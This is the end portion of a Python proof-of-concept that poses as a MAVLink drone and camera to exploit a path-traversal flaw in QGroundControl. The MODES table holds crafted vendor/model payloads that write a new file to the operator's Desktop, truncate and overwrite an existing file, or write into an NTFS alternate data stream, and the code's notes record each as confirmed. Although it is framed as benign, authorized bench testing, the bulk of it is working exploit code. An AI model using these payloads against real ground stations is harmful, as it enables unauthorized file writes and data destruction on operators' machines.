                msg = self.master.recv_match(blocking=True, timeout=0.5)
            except Exception:
                msg = None
                time.sleep(0.2)
            if msg is None:
                continue
            t = msg.get_type()
            if t == "BAD_DATA":
                continue

            if t == "FILE_TRANSFER_PROTOCOL":
                self._handle_ftp(msg)
                continue

            if t in ("COMMAND_LONG", "COMMAND_INT"):
                c = getattr(msg, "command", None)
                tgt = getattr(msg, "target_component", None)
                req_msg = int(getattr(msg, "param1", 0) or 0)
                REQ_MESSAGE = getattr(mavutil.mavlink, "MAV_CMD_REQUEST_MESSAGE", 512)
                REQ_CAMINFO = getattr(mavutil.mavlink, "MAV_CMD_REQUEST_CAMERA_INFORMATION", 521)
                CAMINFO_ID = getattr(mavutil.mavlink, "MAVLINK_MSG_ID_CAMERA_INFORMATION", 259)

                wants_caminfo = (c == REQ_CAMINFO) or (c == REQ_MESSAGE and req_msg == CAMINFO_ID)
                if wants_caminfo and tgt == self.cam_compid:
                    observe("QGC asked compid %d for CAMERA_INFORMATION (cmd=%s) -- answering"
                            % (self.cam_compid, c))
                    self._as_camera(self.master.mav.command_ack_send,
                                    c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
                    self.send_camera_info_now()
                    continue

                if c == mavutil.mavlink.MAV_CMD_REQUEST_AUTOPILOT_CAPABILITIES:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
                elif c == REQ_MESSAGE and req_msg == mavutil.mavlink.MAVLINK_MSG_ID_AUTOPILOT_VERSION:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
                elif self.verbose:
                    observe("GCS sent %s command=%s target_comp=%s" % (t, c, tgt))
                continue

            if t == "MISSION_REQUEST_LIST":
                mt = getattr(msg, "mission_type", 0)
                try:
                    self.master.mav.mission_count_send(
                        msg.get_srcSystem(), msg.get_srcComponent(), 0, mt)
                except Exception:
                    pass
                continue

            if t == "PARAM_REQUEST_LIST":
                if self.verbose:
                    observe("GCS requested PARAM_REQUEST_LIST -- serving %d params"
                            % len(self.PARAMS))
                for i, (nm, val) in enumerate(self.PARAMS.items()):
                    self.send_param_value(nm, val, count=len(self.PARAMS), index=i)
                continue

            if t == "PARAM_REQUEST_READ":
                pn = getattr(msg, "param_id", "")
                if isinstance(pn, bytes):
                    pn = pn.decode("utf-8", "ignore")
                pn = pn.rstrip("\x00")
                if pn:
                    if pn not in self.PARAMS:
                        self.PARAMS[pn] = 0.0
                    idx = list(self.PARAMS.keys()).index(pn)
                    self.send_param_value(pn, self.PARAMS[pn],
                                          count=len(self.PARAMS), index=idx)
                continue

            if t == "AUTOPILOT_VERSION_REQUEST":
                self.send_autopilot_version()
                continue


# Windows: parameterSavePath() = %USERPROFILE%\Documents\QGroundControl\Parameters
# 3 x ../  ->  Parameters -> QGroundControl -> Documents -> %USERPROFILE%
MODES = {
    "traversal": dict(
        vendor="../../../Desktop/QGC01_PWNED",
        model="marker",
        note="write a NEW file onto the operator's Desktop, outside parameterSavePath()"),
    "overwrite": dict(
        vendor="../../../Desktop/QGC01-VICTIM",
        model="x",
        note="TRUNCATE + overwrite an existing file. Create "
             "%USERPROFILE%\\Desktop\\QGC01-VICTIM_x_001.xml with recognisable "
             "content first, then watch it be replaced. REQUIRES --http: the "
             "mftp:// branch is gated on !xmlFile.exists() and is skipped "
             "entirely when the target is already there, so only the HTTP "
             "path can reach the truncating write. CONFIRMED 2026-08-26 on "
             "QGC 5.1.3 / Windows 11: 'MISSION CONFIG - DO NOT LOSE' was "
             "replaced by the served definition XML with zero operator "
             "interaction"),
    "ads": dict(
        # MUST fit in the 32-byte uint8_t[32] wire field or the trailing ':' is
        # truncated off and the probe tests nothing. "../../../Desktop/T.txt:" is
        # 23 bytes, so the colon survives.
        vendor="../../../Desktop/T.txt:",
        model="s",
        note="write into an NTFS alternate data stream, escaping the forced .xml "
             "extension AND the !exists() gate (QFile::exists() tests the STREAM, "
             "not the host file). CONFIRMED 2026-08-26: stream '_s_001.xml' 234 "
             "bytes appeared on an existing Desktop\\T.txt whose :$DATA stayed "
             "intact. Target must be short enough that ':' survives the 32-byte "
             "wire field"),
}


def main():
    pre = argparse.ArgumentParser(add_help=False)
    pre.add_argument("--mode", choices=sorted(MODES), default="traversal")
    pre.add_argument("--vendor", help="override vendor_name (uint8[32])")
    pre.add_argument("--model", help="override model_name (uint8[32])")
    pre.add_argument("--cam-compid", type=int, default=MAV_COMP_ID_CAMERA,
                     help="camera component id, must be 100..105 for QGC to solicit "
                          "camera info (default 100). Use a FRESH id to re-test without "
                          "reconnecting -- infoReceived latches per component.")
    pre.add_argument("--http", metavar="HOST:PORT",
                     help="serve the definition XML over http://HOST:PORT/cam.xml instead "
                          "of mftp:// -- exercises the _cacheFile sink rather than the "
                          "FTPManager one")
    pre.add_argument("--version-byte", type=int, default=1,
                     help="cam_definition_version, becomes the %%03d in the filename")
    args, rest = pre.parse_known_args()

    m = MODES[args.mode]
    vendor = args.vendor if args.vendor is not None else m["vendor"]
    model = args.model if args.model is not None else m["model"]

    if args.http:
        cam_uri = "http://%s/cam.xml" % args.http
    else:
        cam_uri = "mftp://cam.xml"

    banner("QGC-01: CAMERA_INFORMATION vendor/model -> traversed file write")
    warn("BENIGN PoC. Authorized localhost/bench QGroundControl only. The XML we")
    warn("serve is an inert marker; only the PATH is hostile.")
    observe("mode=%s -- %s" % (args.mode, m["note"]))
    observe("vendor_name = %r  (%d of 32 bytes)" % (vendor, len(vendor.encode())))
    observe("model_name  = %r" % model)
    observe("cam_definition_uri = %r" % cam_uri)
    expect = "%s_%s_%03d.xml" % (vendor, model, args.version_byte)
    observe("QGC will build: parameterSavePath()/%s" % expect)
    if len(vendor.encode()) > 32:
        warn("vendor_name is %d bytes -- the wire field is uint8_t[32], so the tail"
             % len(vendor.encode()))
        warn("WILL be truncated. Shorten it or the test measures the wrong thing.")
        if args.mode == "ads":
            warn("Refusing to run the ADS probe with a truncated vendor_name: the")
            warn("trailing ':' would be cut off and the result would be meaningless.")
            return

    sys.argv = [sys.argv[0]] + rest
    base = FakeVehicle.from_cli("QGC-01 camera-info path traversal")
    v = CameraVehicle(base.conn_str, sysid=base.sysid, compid=base.compid,
                      verbose=base.verbose,
                      cam_compid=args.cam_compid, cam_vendor=vendor,
                      cam_model=model, cam_uri=cam_uri,
                      cam_version=args.version_byte)

    # Serve a real parameter set so QGC's initial connect completes. Without this
    # _initialConnectComplete stays false and the camera manager ignores every
    # message we send (see build_param_pck docstring).
    pck = build_param_pck()
    v.add_ftp_file("@PARAM/param.pck", pck)
    observe("serving @PARAM/param.pck (%d bytes) so the initial connect completes" % len(pck))

    if not args.http:
        v.add_ftp_file("cam.xml", BENIGN_CAM_DEF_XML)
        v.add_ftp_dir_entry("cam.xml", size=len(BENIGN_CAM_DEF_XML), is_dir=False)
        observe("serving the definition XML over MAVFTP as 'cam.xml' (%d bytes)"
                % len(BENIGN_CAM_DEF_XML))
    else:
        # No HTTP server is embedded here on purpose -- the interesting half of
        # this PoC is the MAVLink side, and a stock one-liner serves the XML
        # perfectly well. Write it out so `python3 -m http.server` just works.
        xml_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "cam.xml")
        with open(xml_path, "wb") as fh:
            fh.write(BENIGN_CAM_DEF_XML)
        _host, _, _port = args.http.partition(":")
        _port = int(_port or 80)
        observe("wrote %s (%d bytes)" % (xml_path, len(BENIGN_CAM_DEF_XML)))
        observe("serve it in another terminal, from this directory:")
        observe("    python3 -m http.server %d" % _port)
        observe("advertising cam_definition_uri = %s" % cam_uri)
        observe("this exercises the _cacheFile sink (VehicleCameraControl.cc:929-936,")
        observe("QIODevice::WriteOnly == TRUNCATE) rather than the FTPManager sink.")
        observe("The mftp:// path is create-only: it is gated on !xmlFile.exists().")

    v.start()
    attack("Camera component %d heartbeating at 1 Hz." % args.cam_compid)
    attack("In QGC: add a TCP link to this host:5760 and CONNECT. Then wait --")
    attack("QGC solicits CAMERA_INFORMATION by itself; there is nothing to click.")
    observe("If QGC logs 'Ignoring - Camera info not requested', the camera compid is")
    observe("outside 100..105 or the initial connect had not completed yet.")
    v.serve_forever()


if __name__ == "__main__":
    main()
